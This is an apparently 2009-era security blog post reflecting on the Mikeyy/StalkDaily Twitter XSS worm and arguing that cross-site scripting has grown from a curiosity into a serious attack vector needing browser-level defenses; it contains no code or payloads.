We Used To Laugh At XSS
Last weekend, a web based Twitter worm (aka Mikeyy/StalkDaily worm) hit the media. It was the work of Michael Mooney, a 17 year old, self described 'bored developer', who was brazen enough to brag about the attacks after the fact. He may be regretting the publicity at this point, now that his systems have been publicly hacked and he's no doubt heard about how Samy Kamkar was rewarded for his efforts after a similar attack on MySpace with a felony conviction. However, thus far it seems to have landed him a job as opposed to jail time.
What has happened to turn XSS from amusing interweb trickery into a valuable attack vector? In short, the web has changed, but unfortunately security is lagging behind. In general, I see the following four factors that deserve credit:
1.) Prevention [should be] the best Medicine - We've known about the dangers of XSS for at least a decade now, and yet it remains the most prevalent web application vulnerability out there. Efforts to educate developers has produced limited results, not in my opinion because developers don't care, but because the population of web developers is growing at a tremendous pace, thanks to point 'n click development environments. We've empowered millions with the tools to develop web applications but we've also made it far to easy to produce an insecure application.
3.) The Power of Social Networking - Web based worms such as the Twitter worm have one inherent limitation - they live within the ecosystem where they were created. While this would be significant for a seldom used web application, with social networking sites measuring active users in the hundreds of millions this is hardly a limitation at all.
4.) Sky's the limit - While we tend to think of XSS as a way to steal session credentials, such attacks are limited only be the creativity of the researchers/attackers that pursue them. Anton Rager developed XSS-Proxy as a means to remotely control XSS attacks. Billy Hoffman turned a browser into a vulnerability scanner via XSS. Jeremiah Grossman demonstrated gaining insight into someone's browser history and at Black Hat DC this year, I talked about how XSS can be used to conduct client-side SQL injection. The list goes on and on...
The Twitter and MySpace worms were largely benign. When traditional worms began spreading, they were largely benign as well, a proof of concept to prove that something could be done. Once that hurdle had been overcome, criminals moved in to profit and I don't expect the outcome to be any different this time around either.
We've set the bar far too low for attackers. Well known vulnerabilities such as XSS remain far too prevalent, despite having been around for years. It's encouraging to see Microsoft stepping into the fray by adding XSS prevention to Internet Explorer 8 and I hope that other browser vendors will do the same. While the root cause lies with web app developers, it is clear that focusing on developers alone will not fix the problem. The interconnected nature of the web requires that all players pitch in to reduce risk to end users.